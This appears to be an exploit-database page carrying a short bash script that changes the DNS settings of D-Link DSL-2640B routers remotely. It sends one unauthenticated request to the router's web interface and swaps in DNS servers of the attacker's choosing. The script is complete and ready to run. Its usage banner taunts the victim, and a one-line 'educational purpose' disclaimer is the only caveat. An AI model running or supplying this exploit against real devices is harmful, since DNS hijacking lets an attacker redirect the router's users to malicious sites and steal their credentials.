D-Link DSL-2640B Remote DNS Changer



EKU-ID: 6403 CVE: OSVDB-ID:
Author: cryptolulz666 Published: 2017-03-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/bin/bash 
# 
# D-Link DSL-2640B Remote DNS Change Exploit 
# Description: 
# Different D-Link Routers are vulnerable to DNS change. 
# The vulnerability exist in the web interface, which is 
# accessible without authentication. 
# 
# Tested On Linux/ubuntu/Debian/All Other Linux 
# Compatible Core i86 
# Script Bash By Cryptolulz666 
# Use This For Educational Purphose 
if [[ $# -gt 3 || $# -lt 2 ]]; then 
    echo " D-Link DSL-2640B Remote DNS Change Exploit" 
    echo " ================================================================" 
    echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" 
    echo " Example: $0 192.168.1.1 8.8.8.8" 
    echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" 
    echo "" 
    echo " Copyright none public " 
    echo " security sucks ass " 
    echo " this server is vuln and you are owned " 
    exit; 
fi 
GET=`which GET 2>/dev/null` 

if [ $? -ne 0 ]; then 
    echo " Error : libwww-perl not found =/" 
    exit; 
fi

GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1